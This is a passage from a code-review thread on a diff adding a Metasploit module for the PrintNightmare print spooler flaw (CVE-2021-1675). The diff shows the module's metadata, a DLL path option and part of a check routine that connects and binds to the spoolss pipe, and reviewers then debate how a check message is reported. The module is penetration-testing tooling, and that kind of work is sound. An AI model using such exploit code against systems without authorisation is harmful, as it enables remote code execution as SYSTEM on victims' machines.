modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

```diff
@@ -0,0 +1,439 @@
+      (4 - offset) % 4
+    end
+  end
+end
+
+class MetasploitModule < Msf::Auxiliary
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+
+  # PrintSystem = RubySMB::Dcerpc::PrintSystem
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Print Spooler Remote DLL Injection',
+        'Description' => %q{
+          The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted
+          DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM.
+        },
+        'Author' => [
+          'Zhiniang Peng',           # vulnerability discovery / research
+          'Xuefeng Li',              # vulnerability discovery / research
+          'Zhipeng Huo',             # vulnerability discovery
+          'Piotr Madej',             # vulnerability discovery
+          'Zhang Yunhai',            # vulnerability discovery
+          'cube0x0',                 # PoC
+          'Spencer McIntyre',        # metasploit module
+          'Christophe De La Fuente', # metasploit module co-author
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-1675'],
+          ['CVE', '2021-34527'],
+          ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],
+          ['URL', 'https://github.com/afwu/PrintNightmare'],
+          ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1']
+        ],
+        'Notes' => {
+          'AKA' => [ 'PrintNightmare' ],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [
+            UNRELIABLE_SESSION # appears to fail after succeeding once until the server is restarted
+          ],
+          'SideEffects' => [
+            ARTIFACTS_ON_DISK # the dll will be copied to the remote server
+          ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('DLL_PATH', [ true, 'The path to the DLL that the server should load' ])
+      ]
+    )
+  end
+
+  def check
+    begin
+      connect
+    rescue Rex::ConnectionError
+      return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::LoginError
+      return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')
+    end
+
+    handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])
+    vprint_status("Binding to #{handle} ...")
+    begin
+      dcerpc_bind(handle)
+    rescue RubySMB::Error::UnexpectedStatusCode => e
+      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first
+      if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND
+        print_status("The 'Print Spooler' service is disabled.")
```

Comment:
Would it not be better to change this to this to have the output returned in the checkcode? Also shouldn't this at the very least be `print_error` vs `print_status`?

```suggestion
        return Exploit::CheckCode::Safe("The 'Print Spooler' service is disabled.")
```

Reply:
It's not really an error in the context of a check method. Also this message is just for context.

Reply:
This will be changed in a ninja commit before I land this.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/commit/70fd9376e3ad83a52e12fe0237fb8f6459db9cdd